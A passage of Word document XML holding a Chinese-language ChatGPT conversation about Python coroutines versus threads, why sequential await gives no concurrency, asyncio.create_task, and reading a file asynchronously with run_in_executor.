        <w:t>首先，协程和线程运行在不同的环境中：协程运行在单个线程中，而多线程程序在多个线程中运行。协程通过在一个线程中切换上下文（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>context</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来模拟并发，而多线程程序使用操作系统的线程来实现并发。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F8CE45" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="280DFCCB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协程的优点是它们比线程更轻量级，创建和销毁协程的开销比创建和销毁线程的开销小。此外，协程由程序员明确地控制，可以更精细地控制何时进行切换，而线程的切换通常由操作系统控制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA7B56A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BE769CB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然而，协程的一个重要限制是它们在单个线程中运行，不能利用多核处理器。这意味着，如果你的程序是计算密集型的（比如，它需要执行大量的数学运算），那么使用多线程或者多进程可能会更好。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D252C1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ABDB74B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以，是否使用协程或多线程取决于你的具体需求。如果你的程序是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> IO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密集型的（比如，它需要处理网络请求或数据库查询），那么使用协程可能会更有效。如果你的程序是计算密集型的，那么可能需要使用多线程或多进程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2D716B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0964E00E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF425D1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5BADA0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A209FC7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="609E6829" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def say_after(delay, what):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380EE90D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    await asyncio.sleep(delay)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0F70BD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    print(what)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E64D467" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D357A23" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079B8156" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print(f"started at {time.strftime('%X')}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BD7404" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4618AB00" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    await say_after(1, 'hello')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B64E80E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    #await say_after(1, 'hello')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行完之后，才继续向下执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29273EBF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    await say_after(2, 'world')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619F012C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BFCE262" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print(f"finished at {time.strftime('%X')}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F858493" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="603BAD01" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>asyncio.run(main())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C68E2A4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种写法的异步是不是没有意义？因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是等待其执行完毕才会执行后面的代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECBA145" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F698ED" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73559329" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你的理解是正确的。在你的这个特定例子中，你先后调用了两个异步函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> say_after(1, 'hello') </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> say_after(2, 'world')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并且用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分别等待它们完成。因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会等待其后的协程执行完毕，所以这两个异步函数实际上是顺序执行的，没有实现并发。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FB8EA5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="319C286F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但请注意，虽然这个例子中的异步操作没有实现并发，但并不意味着</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> async/await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本身没有意义。这只是因为你的代码选择了按顺序执行两个异步函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC7F1A8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="678E90DF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的异步编程中，要实现并发，一种常见的方式是使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.gather(*tasks) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.wait(tasks) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，它们可以接受多个协程，然后在单个操作中等待所有协程完成。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6358A8DB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B52BE56" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105CCED9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537819FF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    task1 = asyncio.create_task(say_after(1, 'hello'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418A2A32" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    task2 = asyncio.create_task(say_after(2, 'world'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C81A2D8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44511AC6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print(f"started at {time.strftime('%X')}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767D03C1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3505FD8C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    await task1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DCB635" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    await task2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B46DAA2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="783E4859" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print(f"finished at {time.strftime('%X')}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086A73D3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76EA11EF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>asyncio.run(main())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBEE514" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1266EF6F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个修改后的代码中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">say_after(1, 'hello') </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> say_after(2, 'world') </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将会并发执行，而不是顺序执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FC2D86" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126B2A00" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>async-await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的写法打开一个文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3436FDF2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB8EC61" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D51194F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的异步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并没有直接提供异步的文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作。这是因为在许多操作系统中，文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并不是异步的，因此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不能直接提供异步的文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B44BDE5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2735DDFF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然而，你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> run_in_executor() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法将文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作放在一个单独的线程中执行，从而不阻塞你的主事件循环。例如，以下是一个异步读取文件的例子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58925760" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="012EF29E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011E4ABA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02258550" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7477EE77" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def read_file(file_path):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380436BA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    loop = asyncio.get_event_loop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B442E2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    with open(file_path, 'r') as file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62768C40" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行在默认的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> executor </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EF5D45" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        data = await loop.run_in_executor(None, file.read)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DA2119" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78346776" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D722097" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E590B1B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    data = await read_file('my_file.txt')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690C0B3C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E17E387" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="458066A5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>asyncio.run(main())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EE8F0C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FF2A7A8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
